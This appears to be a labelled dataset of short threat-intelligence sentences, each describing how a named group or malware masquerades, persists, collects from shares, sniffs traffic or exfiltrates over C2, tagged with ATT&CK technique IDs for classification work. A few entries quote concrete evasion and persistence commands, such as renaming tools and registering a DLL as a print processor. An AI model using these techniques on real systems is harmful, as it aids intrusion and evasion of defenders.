{"text1":"Scarlet Mimic has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.","labels":"['T1036.002']"}
|
|
{"text1":"APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.","labels":"['T1036.003']"}
|
|
{"text1":"Kevin has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.","labels":"['T1036.003']"}
|
|
{"text1":"Lazarus Group has renamed system utilities such as \"wscript.exe\" and \"mshta.exe\".","labels":"['T1036.003']"}
|
|
{"text1":"The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.","labels":"['T1036.003']"}
|
|
{"text1":"A Lazarus Group custom backdoor implant included a custom PE loader named \"Security Package\" that was added into the lsass.exe process via registry key.","labels":"['T1036.004']"}
|
|
{"text1":"APT-C-36 has disguised its scheduled tasks as those used by Google.","labels":"['T1036.004']"}
|
|
{"text1":"APT29 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate.","labels":"['T1036.004']"}
|
|
{"text1":"APT41 has created services to appear as benign system tools.","labels":"['T1036.004']"}
|
|
{"text1":"BITTER has disguised malware as a Windows Security update service.","labels":"['T1036.004']"}
|
|
{"text1":"Bazar can create a task named to appear benign.","labels":"['T1036.004']"}
|
|
{"text1":"CSPY Downloader has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.","labels":"['T1036.004']"}
|
|
{"text1":"Carbanak has copied legitimate service names to use for malicious services.","labels":"['T1036.004']"}
|
|
{"text1":"Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.","labels":"['T1036.004']"}
|
|
{"text1":"ComRAT has used a task name associated with Windows SQM Consolidator.","labels":"['T1036.004']"}
|
|
{"text1":"Crutch has established persistence with a scheduled task impersonating the Outlook item finder.","labels":"['T1036.004']"}
|
|
{"text1":"DCSrv has masqueraded its service as a legitimate svchost.exe process.","labels":"['T1036.004']"}
|
|
{"text1":"Egregor has masqueraded the svchost.exe process to exfiltrate data.","labels":"['T1036.004']"}
|
|
{"text1":"FIN6 has renamed the \"psexec\" service name to \"mstdc\" to masquerade as a legitimate Windows service.","labels":"['T1036.004']"}
|
|
{"text1":"FIN7 has created a scheduled task named \u201cAdobeFlashSync\u201d to establish persistence.","labels":"['T1036.004']"}
|
|
{"text1":"FunnyDream has used a service named `WSearch` for execution.","labels":"['T1036.004']"}
|
|
{"text1":"Fysbis has masqueraded as the rsyncd and dbus-inotifier services.","labels":"['T1036.004']"}
|
|
{"text1":"GoldMax has impersonated systems management software to avoid detection.","labels":"['T1036.004']"}
|
|
{"text1":"Green Lambert has created a new executable named `Software Update Check` to appear legitimate.","labels":"['T1036.004']"}
|
|
{"text1":"Heyoka Backdoor has been named `srvdll.dll` to appear as a legitimate service.","labels":"['T1036.004']"}
|
|
{"text1":"Higaisa named a shellcode loader binary \"svchast.exe\" to spoof the legitimate \"svchost.exe\".","labels":"['T1036.004']"}
|
|
{"text1":"Hildegard has disguised itself as a known Linux process.","labels":"['T1036.004']"}
|
|
{"text1":"In one instance, menuPass added PlugX as a service with a display name of \"Corel Writing Tools Utility.\"","labels":"['T1036.004']"}
|
|
{"text1":"IronNetInjector has been disguised as a legitimate service using the name PythonUpdateSrvc.","labels":"['T1036.004']"}
|
|
{"text1":"KillDisk registers as a service under the Plug-And-Play Support name.","labels":"['T1036.004']"}
|
|
{"text1":"Kimsuky has disguised services to appear as benign software or related to operating system functions.","labels":"['T1036.004']"}
|
|
{"text1":"Machete renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.","labels":"['T1036.004']"}
|
|
{"text1":"Naikon renamed a malicious service \"taskmgr\" to appear to be a legitimate version of Task Manager.","labels":"['T1036.004']"}
|
|
{"text1":"Nebulae has created a service named \"Windows Update Agent1\" to appear legitimate.","labels":"['T1036.004']"}
|
|
{"text1":"OSX_OCEANLOTUS.D has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents.","labels":"['T1036.004']"}
|
|
{"text1":"Okrum can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.","labels":"['T1036.004']"}
|
|
{"text1":"POWERSTATS has created a scheduled task named \"MicrosoftEdge\" to establish persistence.","labels":"['T1036.004']"}
|
|
{"text1":"PROMETHIUM has named services to appear legitimate.","labels":"['T1036.004']"}
|
|
{"text1":"PingPull can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`, and `Onedrive` to evade detection.","labels":"['T1036.004']"}
|
|
{"text1":"SUGARDUMP's scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version.","labels":"['T1036.004']"}
|
|
{"text1":"Seasalt has masqueraded as a service called \"SaSaut\" with a display name of \"System Authorization Service\" in an apparent attempt to masquerade as a legitimate service.","labels":"['T1036.004']"}
|
|
{"text1":"Shamoon creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\"","labels":"['T1036.004']"}
|
|
{"text1":"ShimRat can impersonate Windows services and antivirus products to avoid detection on compromised systems.","labels":"['T1036.004']"}
|
|
{"text1":"Tarrask creates a scheduled task called \u201cWinUpdate\u201d to re-establish any dropped C2 connections.","labels":"['T1036.004']"}
|
|
{"text1":"The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description \u201cWindows Check AV\u201d in an apparent attempt to masquerade as a legitimate service.","labels":"['T1036.004']"}
|
|
{"text1":"To establish persistence, Truvasys adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager.","labels":"['T1036.004']"}
|
|
{"text1":"UNC2452 named tasks \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" in order to appear legitimate.","labels":"['T1036.004']"}
|
|
{"text1":"Wizard Spider has used scheduled tasks to install TrickBot, using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf. It has also used common document file names for other malware binaries.","labels":"['T1036.004']"}
|
|
{"text1":"ZIRCONIUM has created a run key named \"Dropbox Update Setup\" to mask a persistence mechanism for a malicious binary.","labels":"['T1036.004']"}
|
|
{"text1":"ZxxZ has been disguised as a Windows security update service.","labels":"['T1036.004']"}
|
|
{"text1":"build_downer has added itself to the Registry Run key as \"NVIDIA\" to appear legitimate.","labels":"['T1036.004']"}
|
|
{"text1":"A Winnti for Windows implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.","labels":"['T1036.005']"}
|
|
{"text1":"APT28 has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.","labels":"['T1036.005']"}
|
|
{"text1":"APT29 renamed software and DLL's with legitimate names to appear benign.","labels":"['T1036.005']"}
|
|
{"text1":"APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe.","labels":"['T1036.005']"}
|
|
{"text1":"AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.","labels":"['T1036.005']"}
|
|
{"text1":"BADNEWS attempts to hide its payloads using legitimate filenames.","labels":"['T1036.005']"}
|
|
{"text1":"BLINDINGCAN has attempted to hide its payload by using legitimate file names such as \"iconcache.db\".","labels":"['T1036.005']"}
|
|
{"text1":"BRONZE BUTLER has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.","labels":"['T1036.005']"}
|
|
{"text1":"BackdoorDiplomacy has dropped implants in folders named for legitimate software.","labels":"['T1036.005']"}
|
|
{"text1":"Bad Rabbit has masqueraded as a Flash Player installer through the executable file \"install_flash_player.exe\".","labels":"['T1036.005']"}
|
|
{"text1":"Blue Mockingbird has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.","labels":"['T1036.005']"}
|
|
{"text1":"Bumblebee has named component DLLs \"RapportGP.dll\" to match those used by the security company Trusteer.","labels":"['T1036.005']"}
|
|
{"text1":"Bundlore has disguised a malicious .app file as a Flash Player update.","labels":"['T1036.005']"}
|
|
{"text1":"Carbanak has named malware \"svchost.exe,\" which is the name of the Windows shared service host program.","labels":"['T1036.005']"}
|
|
{"text1":"Carberp has masqueraded as Windows system file names, as well as \"chkntfs.exe\" and \"syscron.exe\".","labels":"['T1036.005']"}
|
|
{"text1":"ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).","labels":"['T1036.005']"}
|
|
{"text1":"Chaes has used an unsigned, crafted DLL module named \"hha.dll\" that was designed to look like a legitimate 32-bit Windows DLL.","labels":"['T1036.005']"}
|
|
{"text1":"Cuba has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs.","labels":"['T1036.005']"}
|
|
{"text1":"DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`.","labels":"['T1036.005']"}
|
|
{"text1":"DanBot files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools.","labels":"['T1036.005']"}
|
|
{"text1":"Darkhotel has used malware that is disguised as a Secure Shell (SSH) tool.","labels":"['T1036.005']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.","labels":"['T1036.005']"}
|
|
{"text1":"During Operation Honeybee, the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC.","labels":"['T1036.005']"}
|
|
{"text1":"During Operation Sharpshooter, threat actors installed Rising Sun in the Startup folder and disguised it as `mssync.exe`.","labels":"['T1036.005']"}
|
|
{"text1":"During Operation Wocao, the threat actors renamed some tools and executables to appear as legitimate programs.","labels":"['T1036.005']"}
|
|
{"text1":"Earth Lusca used the command `move [file path] c:\\windows\\system32\\spool\\prtprocs\\x64\\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.","labels":"['T1036.005']"}
|
|
{"text1":"FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.","labels":"['T1036.005']"}
|
|
{"text1":"Felismus has masqueraded as legitimate Adobe Content Management System files.","labels":"['T1036.005']"}
|
|
{"text1":"Ferocious Kitten has named malicious files \"update.exe\" and loaded them into the compromise host's \u201cPublic\u201d folder.","labels":"['T1036.005']"}
|
|
{"text1":"FinFisher renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.","labels":"['T1036.005']"}
|
|
{"text1":"FoggyWeb can be disguised as a Visual Studio file such as `Windows.Data.TimeZones.zh-PH.pri` to evade detection. Also, FoggyWeb's loader can mimic a genuine `dll` file that carries out the same import functions as the legitimate Windows `version.dll` file.","labels":"['T1036.005']"}
|
|
{"text1":"Fox Kitten has named binaries and configuration files svhost and dllhost respectively to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"Fysbis has masqueraded as trusted software rsyncd and dbus-inotifier.","labels":"['T1036.005']"}
|
|
{"text1":"Gamaredon Group has used legitimate process names to hide malware including \"svchosst\".","labels":"['T1036.005']"}
|
|
{"text1":"Gelsemium has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value \"Chrome Update\" to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"GoldenSpy's setup file installs initial executables under the folder \"%WinDir%\\System32\\PluginManager\".","labels":"['T1036.005']"}
|
|
{"text1":"Goopy has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.","labels":"['T1036.005']"}
|
|
{"text1":"Grandoreiro has named malicious browser extensions and update files to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"Green Lambert has been disguised as a Growl help file.","labels":"['T1036.005']"}
|
|
{"text1":"HTTPBrowser's installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.","labels":"['T1036.005']"}
|
|
{"text1":"HermeticWiper has used the name `postgressql.exe` to mask a malicious payload.","labels":"['T1036.005']"}
|
|
{"text1":"HermeticWizard has been named `exec_32.dll` to mimic a legitimate MS Outlook .dll.","labels":"['T1036.005']"}
|
|
{"text1":"IceApple .NET assemblies have used `App_Web_` in their file names to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"If installing itself as a service fails, Elise instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network.","labels":"['T1036.005']"}
|
|
{"text1":"Indrik Spider used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.","labels":"['T1036.005']"}
|
|
{"text1":"InnaputRAT variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.","labels":"['T1036.005']"}
|
|
{"text1":"InvisiMole has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.","labels":"['T1036.005']"}
|
|
{"text1":"KGH_SPY has masqueraded as a legitimate Windows tool.","labels":"['T1036.005']"}
|
|
{"text1":"KONNI has created a shortcut called \"Anti virus service.lnk\" in an apparent attempt to masquerade as a legitimate file.","labels":"['T1036.005']"}
|
|
{"text1":"Ke3chang has dropped their malware into legitimate installed software paths including: `C:\\ProgramFiles\\Realtek\\Audio\\HDA\\AERTSr.exe`, `C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\FoxitRdr64.exe`, `C:\\Program Files (x86)\\Adobe\\Flash Player\\AddIns\\airappinstaller\\airappinstall.exe`, and `C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd64.exe`.","labels":"['T1036.005']"}
|
|
{"text1":"Kimsuky has renamed malware to legitimate names such as \"ESTCommon.dll\" or \"patch.dll\".","labels":"['T1036.005']"}
|
|
{"text1":"Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.","labels":"['T1036.005']"}
|
|
{"text1":"LookBack has a C2 proxy tool that masquerades as \"GUP.exe\", which is software used by Notepad++.","labels":"['T1036.005']"}
|
|
{"text1":"MCMD has been named Readme.txt to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.","labels":"['T1036.005']"}
|
|
{"text1":"Machete's Machete MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer.","labels":"['T1036.005']"}
|
|
{"text1":"MarkiRAT can masquerade as \"update.exe\" and \"svehost.exe\"; it has also mimicked legitimate Telegram and Chrome files.","labels":"['T1036.005']"}
|
|
{"text1":"MechaFlounder has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.","labels":"['T1036.005']"}
|
|
{"text1":"Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.","labels":"['T1036.005']"}
|
|
{"text1":"Misdat saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.","labels":"['T1036.005']"}
|
|
{"text1":"MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.","labels":"['T1036.005']"}
|
|
{"text1":"Mustang Panda has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise PlugX, and a file named `OneDrive.exe` to load a Cobalt Strike payload.","labels":"['T1036.005']"}
|
|
{"text1":"Naikon has disguised malicious programs as Google Chrome, Adobe, and VMware executables.","labels":"['T1036.005']"}
|
|
{"text1":"Nebulae uses functions named \"StartUserModeBrowserInjection\" and \"StopUserModeBrowserInjection\" indicating that it's trying to imitate chrome_frame_helper.dll.","labels":"['T1036.005']"}
|
|
{"text1":"OLDBAIT installs itself in \"%ALLUSERPROFILE%\\\\Application Data\\Microsoft\\MediaPlayer\\updatewindws.exe\"; the directory name is missing a space and the file name is missing the letter \"o.\"","labels":"['T1036.005']"}
|
|
{"text1":"OSX\/Shlayer can masquerade as a Flash Player update.","labels":"['T1036.005']"}
|
|
{"text1":"Octopus has been disguised as legitimate programs, such as Java and Telegram Messenger.","labels":"['T1036.005']"}
|
|
{"text1":"One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.","labels":"['T1036.005']"}
|
|
{"text1":"OwaAuth uses the filename owaauth.dll, which is a legitimate file that normally resides in \"%ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\\"; the malicious file by the same name is saved in \"%ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\\".","labels":"['T1036.005']"}
|
|
{"text1":"PUNCHBUGGY mimics filenames from %SYSTEM%\\System32 to hide DLLs in %WINDIR% and\/or %TEMP%.","labels":"['T1036.005']"}
|
|
{"text1":"Patchwork installed its payload in the startup programs folder as \"Baidu Software Update.\" The group also adds its second stage payload to the startup programs as \u201cNet Monitor.\" They have also dropped QuasarRAT binaries as files named microsoft_network.exe and crome.exe.","labels":"['T1036.005']"}
|
|
{"text1":"PcShare has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client.","labels":"['T1036.005']"}
|
|
{"text1":"Penquin has mimicked the Cron binary to hide itself on compromised systems.","labels":"['T1036.005']"}
|
|
{"text1":"PlugX has been disguised as legitimate Adobe and PotPlayer files.","labels":"['T1036.005']"}
|
|
{"text1":"Poseidon Group tools attempt to spoof anti-virus processes as a means of self-defense.","labels":"['T1036.005']"}
|
|
{"text1":"Pysa has executed a malicious executable by naming it svchost.exe.","labels":"['T1036.005']"}
|
|
{"text1":"QUADAGENT used the PowerShell filenames \"Office365DCOMCheck.ps1\" and \"SystemDiskClean.ps1\".","labels":"['T1036.005']"}
|
|
{"text1":"RDAT has masqueraded as VMware.exe.","labels":"['T1036.005']"}
|
|
{"text1":"REvil can mimic the names of known executables.","labels":"['T1036.005']"}
|
|
{"text1":"Raindrop was installed under names that resembled legitimate Windows file and directory names.","labels":"['T1036.005']"}
|
|
{"text1":"RainyDay has used names to mimic legitimate software including \"vmtoolsd.exe\" to spoof Vmtools.","labels":"['T1036.005']"}
|
|
{"text1":"Rocke has used shell scripts which download mining executables and saves them with the filename \"java\".","labels":"['T1036.005']"}
|
|
{"text1":"Ryuk has constructed legitimate appearing installation folder paths by calling \"GetWindowsDirectoryW\" and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as \"C:\\Users\\Public\".","labels":"['T1036.005']"}
|
|
{"text1":"S-Type may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.","labels":"['T1036.005']"}
|
|
{"text1":"SLOTHFULMEDIA has mimicked the names of known executables, such as mediaplayer.exe.","labels":"['T1036.005']"}
|
|
{"text1":"SUGARDUMP has been named `CrashReporter.exe` to appear as a legitimate Mozilla executable.","labels":"['T1036.005']"}
|
|
{"text1":"SUNBURST created VBScripts that were named after existing services or folders to blend into legitimate activities.","labels":"['T1036.005']"}
|
|
{"text1":"SUNSPOT was identified on disk with a filename of \"taskhostsvc.exe\" and it created an encrypted log file at \"C:\\Windows\\Temp\\vmware-vmdmp.log\".","labels":"['T1036.005']"}
|
|
{"text1":"Saint Bot has been disguised as a legitimate executable, including as Windows SDK.","labels":"['T1036.005']"}
|
|
{"text1":"Sandworm Team has avoided detection by naming a malicious binary explorer.exe.","labels":"['T1036.005']"}
|
|
{"text1":"Shark binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"ShimRatReporter spoofed itself as \"AlphaZawgyl_font.exe\", a specialized Unicode font.","labels":"['T1036.005']"}
|
|
{"text1":"Sidewinder has named malicious files \"rekeywiz.exe\" to match the name of a legitimate Windows executable.","labels":"['T1036.005']"}
|
|
{"text1":"Skidmap has created a fake \"rm\" binary to replace the legitimate Linux binary.","labels":"['T1036.005']"}
|
|
{"text1":"Sowbug named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory \"CSIDL_APPDATA\\microsoft\\security\".","labels":"['T1036.005']"}
|
|
{"text1":"StrongPity has been bundled with legitimate software installation files for disguise.","labels":"['T1036.005']"}
|
|
{"text1":"TEMP.Veles has renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.","labels":"['T1036.005']"}
|
|
{"text1":"TRITON disguised itself as the legitimate Triconex Trilog application.","labels":"['T1036.005']"}
|
|
{"text1":"Tarrask has masqueraded as executable files such as `winupdate.exe`, `date.exe`, or `win.exe`.","labels":"['T1036.005']"}
|
|
{"text1":"TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.","labels":"['T1036.005']"}
|
|
{"text1":"The Bazar loader has named malicious shortcuts \"adobe\" and mimicked communications software.","labels":"['T1036.005']"}
|
|
{"text1":"The TAINTEDSCRIBE main executable has disguised itself as Microsoft\u2019s Narrator.","labels":"['T1036.005']"}
|
|
{"text1":"The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by APT1 as a name for malware.","labels":"['T1036.005']"}
|
|
{"text1":"ThiefQuest prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.","labels":"['T1036.005']"}
|
|
{"text1":"ThreatNeedle chooses its payload creation path from a randomly selected service name from netsvc.","labels":"['T1036.005']"}
|
|
{"text1":"TinyTurla has been deployed as `w64time.dll` to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an \u201cOffice Start,\u201d \u201cYahoo Talk,\u201d \u201cMSN Gaming Z0ne,\u201d or \u201cMSN Talk\u201d shortcut.","labels":"['T1036.005', 'T1547.001', 'T1547.009']"}
|
|
{"text1":"Tropic Trooper has hidden payloads in Flash directories and fake installer files.","labels":"['T1036.005']"}
|
|
{"text1":"USBStealer mimics a legitimate Russian program called USB Disk Security.","labels":"['T1036.005']"}
|
|
{"text1":"Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.","labels":"['T1036.005']"}
|
|
{"text1":"WIRTE has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.","labels":"['T1036.005']"}
|
|
{"text1":"admin@338 actors used the following command to rename one of their tools to a benign file name: \"ren \"%temp%\\upload\" audiodg.exe\"","labels":"['T1036.005']"}
|
|
{"text1":"menuPass has been seen changing malicious files to appear legitimate.","labels":"['T1036.005']"}
|
|
{"text1":"Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.","labels":"['T1036.006']"}
|
|
{"text1":"The Bazar loader has used dual-extension executable files such as PreviewReport.DOC.exe.","labels":"['T1036.007']"}
|
|
{"text1":"An APT28 loader Trojan adds the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\" to establish persistence.","labels":"['T1037.001']"}
|
|
{"text1":"Attor's dispatcher can establish persistence via adding a Registry key with a logon script \"HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" \".","labels":"['T1037.001']"}
|
|
{"text1":"Cobalt Group has added persistence by registering the file name for the next stage malware under \"HKCU\\Environment\\UserInitMprLogonScript\".","labels":"['T1037.001']"}
|
|
{"text1":"KGH_SPY has the ability to set the \"HKCU\\Environment\\UserInitMprLogonScript\" Registry key to execute logon scripts.","labels":"['T1037.001']"}
|
|
{"text1":"Zebrocy performs persistence with a logon script via adding to the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\".","labels":"['T1037.001']"}
|
|
{"text1":"Cyclops Blink has the ability to execute on device startup, using a modified RC script named S51armled.","labels":"['T1037.004']"}
|
|
{"text1":"Green Lambert can add \"init.d\" and \"rc.d\" files in the \"\/etc\" folder to establish persistence.","labels":"['T1037.004']"}
|
|
{"text1":"jRAT can list and manage startup entries.","labels":"['T1037.005']"}
|
|
{"text1":"APT28 has collected files from network shared drives.","labels":"['T1039']"}
|
|
{"text1":"Chimera has collected data of interest from network shares.","labels":"['T1039']"}
|
|
{"text1":"CosmicDuke steals user files from network shared drives with file extensions and keywords that match a predefined list.","labels":"['T1039']"}
|
|
{"text1":"Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel.","labels":"['T1039']"}
|
|
{"text1":"Fox Kitten has searched network shares to access sensitive documents.","labels":"['T1039']"}
|
|
{"text1":"Gamaredon Group malware has collected Microsoft Office documents from mapped network drives.","labels":"['T1039']"}
|
|
{"text1":"Ramsay can collect data from network drives and stage it for exfiltration.","labels":"['T1039']"}
|
|
{"text1":"Sowbug extracted Word documents from a file server on a victim network.","labels":"['T1039']"}
|
|
{"text1":"When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.","labels":"['T1039']"}
|
|
{"text1":"menuPass has collected data from remote systems by mounting network shares with \"net use\" and using Robocopy to transfer data.","labels":"['T1039']"}
|
|
{"text1":"APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials. APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.","labels":"['T1040']"}
|
|
{"text1":"DarkVishnya used network sniffing to obtain login data.","labels":"['T1040']"}
|
|
{"text1":"Emotet has been observed to hook network APIs to monitor network traffic.","labels":"['T1040']"}
|
|
{"text1":"Empire can be used to conduct packet captures on target hosts.","labels":"['T1040']"}
|
|
{"text1":"FoggyWeb can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet\/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.","labels":"['T1040']"}
|
|
{"text1":"Impacket can be used to sniff network traffic via an interface or raw socket.","labels":"['T1040']"}
|
|
{"text1":"MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.","labels":"['T1040']"}
|
|
{"text1":"NBTscan can dump and print whole packet content.","labels":"['T1040']"}
|
|
{"text1":"Penquin can sniff network traffic to look for packets matching specific conditions.","labels":"['T1040']"}
|
|
{"text1":"PoshC2 contains a module for taking packet captures on compromised hosts.","labels":"['T1040']"}
|
|
{"text1":"Responder captures hashes and credentials that are sent to the system after the name services have been poisoned.","labels":"['T1040']"}
|
|
{"text1":"Sandworm Team has used intercepter-NG to sniff passwords in network traffic.","labels":"['T1040']"}
|
|
{"text1":"A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server.","labels":"['T1041']"}
|
|
{"text1":"APT3 has a tool that exfiltrates data over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"APT32's backdoor has exfiltrated data using the already opened channel with its C&C server.","labels":"['T1041']"}
|
|
{"text1":"APT39 has exfiltrated stolen victim data through C2 communications.","labels":"['T1041']"}
|
|
{"text1":"Adversaries can direct BACKSPACE to upload files to the C2 Server.","labels":"['T1041']"}
|
|
{"text1":"AppleJeus has exfiltrated collected host information to a C2 server.","labels":"['T1041']"}
|
|
{"text1":"Astaroth exfiltrates collected information from its r1.log file to the external C2 server.","labels":"['T1041']"}
|
|
{"text1":"Attor has exfiltrated data over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"AuTo Stealer can exfiltrate data over actor-controlled C2 servers via HTTP or TCP.","labels":"['T1041']"}
|
|
{"text1":"BLUELIGHT has exfiltrated data over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"Bandook can upload files from a victim's machine over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"Bankshot exfiltrates data over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"Bisonal has added the exfiltrated data to the URL over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"Bumblebee can send collected data in JSON format to C2.","labels":"['T1041']"}
|
|
{"text1":"CallMe exfiltrates data to its C2 server over the same protocol as C2 communications.","labels":"['T1041']"}
|
|
{"text1":"Cannon exfiltrates collected data over email via SMTP\/S and POP3\/S C2 channels.","labels":"['T1041']"}
|
|
{"text1":"Caterpillar WebShell can upload files over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"CharmPower can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST.","labels":"['T1041']"}
|
|
{"text1":"Chimera has used Cobalt Strike C2 beacons for data exfiltration.","labels":"['T1041']"}
|
|
{"text1":"CreepySnail can connect to C2 for data exfiltration.","labels":"['T1041']"}
|
|
{"text1":"Crimson can exfiltrate stolen information over its C2.","labels":"['T1041']"}
|
|
{"text1":"Crutch can exfiltrate data over the primary C2 channel (Dropbox HTTP API).","labels":"['T1041']"}
|
|
{"text1":"Cyclops Blink has the ability to upload exfiltrated files to a C2 server.","labels":"['T1041']"}
|
|
{"text1":"Data exfiltration is done by Okrum using the already opened channel with the C2 server.","labels":"['T1041']"}
|
|
{"text1":"DnsSystem can exfiltrate collected data to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"Doki has used Ngrok to establish C2 and exfiltrate data.","labels":"['T1041']"}
|
|
{"text1":"Drovorub can exfiltrate files over C2 infrastructure.","labels":"['T1041']"}
|
|
{"text1":"During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2.","labels":"['T1041']"}
|
|
{"text1":"During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers.","labels":"['T1041']"}
|
|
{"text1":"DustySky has exfiltrated data to the C2 server.","labels":"['T1041']"}
|
|
{"text1":"Dyre has the ability to send information staged on a compromised host externally to C2.","labels":"['T1041']"}
|
|
{"text1":"Ebury can exfiltrate SSH credentials through custom DNS queries.","labels":"['T1041']"}
|
|
